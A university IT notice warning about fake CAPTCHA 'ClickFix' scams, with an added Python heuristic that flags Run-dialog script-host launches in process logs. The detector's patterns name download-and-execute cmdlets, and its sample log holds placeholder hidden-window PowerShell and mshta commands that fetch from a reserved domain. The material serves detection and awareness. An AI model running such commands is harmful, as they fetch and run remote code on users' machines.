The risk of fake CAPTCHAs

We’ve all seen CAPTCHA prompts before, the ones asking you to click on images with traffic lights or type some squiggly letters to prove you’re human. But a sneaky scam is making the rounds again: fake CAPTCHA pages that trick you into running malicious code on your device. It’s part of a social engineering tactic known as ClickFix.
 
How does it work? 
You might visit a website (often from a phishing email or pop-up) and see what looks like a normal CAPTCHA, but after clicking the checkbox, it requests a few extra steps, for example: 

  • Pressing Windows + R. 

  • Pasting in some text using Ctrl + V. 

  • Pressing Enter.

The trick is that these steps don’t prove you’re human. Instead, they run malicious code that can infect your device, steal passwords, and give attackers access to your data. This tactic is surprisingly effective because it mimics the kind of verification requests you’re used to seeing.
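For readers on the IT side, here is a small added example (written for this post by the editor, not code from the original notice) showing how the pattern above can be spotted in endpoint process-creation logs. It assumes a constructed pipe-delimited log format (time|parent image|image|command line), and it assumes that a command typed into the Windows Run dialog is spawned with explorer.exe as its parent; the script hosts and command-line indicators it looks for are common heuristics, not a list taken from this page. The sample log lines are constructed and use a placeholder command and a reserved example domain.

```python
"""
Heuristic detector for ClickFix-style "Run dialog" executions.

Added example, not part of the original post. The log format, field names and
sample events are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Interpreters that are typically what a pasted Win+R command ends up launching.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Command-line traits that suggest a command meant to run unseen or fetch something remote.
SUSPICIOUS_ARGS = [
    (re.compile(r"(?i)-w(indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"), "encoded command"),
    (re.compile(r"(?i)https?://"), "remote URL"),
    (re.compile(r"(?i)\b(iex|invoke-expression|downloadstring|invoke-webrequest|curl)\b"),
     "download/eval cmdlet"),
]


@dataclass
class ProcEvent:
    time: str
    parent_image: str
    image: str
    command_line: str


def parse_event(line):
    """Parse one constructed log line: time|parent image|image|command line."""
    parts = line.split("|", 3)          # command line may itself contain '|'
    if len(parts) != 4:
        return None
    return ProcEvent(*(p.strip() for p in parts))


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev):
    """Return the reasons an event looks ClickFix-like; an empty list means no alert."""
    if basename(ev.image) not in SCRIPT_HOSTS:
        return []
    # Assumption: commands entered in the Win+R dialog are children of explorer.exe.
    from_run_dialog = basename(ev.parent_image) == "explorer.exe"
    indicators = [label for pat, label in SUSPICIOUS_ARGS if pat.search(ev.command_line)]
    # Alert only when launch context AND command content are both suspicious,
    # which keeps ordinary scripted PowerShell runs from other parents quiet.
    if from_run_dialog and indicators:
        return ["launched from explorer.exe (Run dialog)"] + indicators
    return []


def detect(lines):
    """Run the heuristic over raw log lines, returning (time, image, reasons) tuples."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        reasons = score_event(ev)
        if reasons:
            hits.append((ev.time, basename(ev.image), reasons))
    return hits


# Constructed sample events: one real-looking ClickFix run, one benign Run-dialog
# launch, one scripted PowerShell run from an editor, and one mshta launch.
SAMPLE_LOG = """\
2024-05-01T10:02:11|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -w hidden -c "<constructed placeholder that fetches https://example.invalid/verify>"
2024-05-01T10:03:40|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe C:\\Users\\alice\\notes.txt
2024-05-01T10:05:02|C:\\Program Files\\VSCode\\Code.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -NoProfile -File build.ps1
2024-05-01T10:06:15|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\mshta.exe|mshta.exe https://example.invalid/captcha.hta
"""

if __name__ == "__main__":
    for time, image, reasons in detect(SAMPLE_LOG.splitlines()):
        print(f"{time} {image}: {', '.join(reasons)}")
```

Only the first and last sample events are flagged: both are script hosts started from explorer.exe with a remote URL (and, for the PowerShell one, a hidden window). The editor-launched PowerShell run and the Notepad launch stay quiet, which is the point of requiring both the launch context and the command content to look wrong.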

What you can do: 

  • Never run or paste commands from unfamiliar sources.

  • If you see a suspicious alert, close the window or browser tab immediately. 

  • Be cautious of CAPTCHA prompts on unfamiliar or unexpected websites. 

  • If something seems suspicious, don’t continue, and report it to the IT Service Desk immediately.

ClickFix relies on tricking users into taking action. By staying cautious and reporting anything unusual, you help protect both yourself and the wider University community.
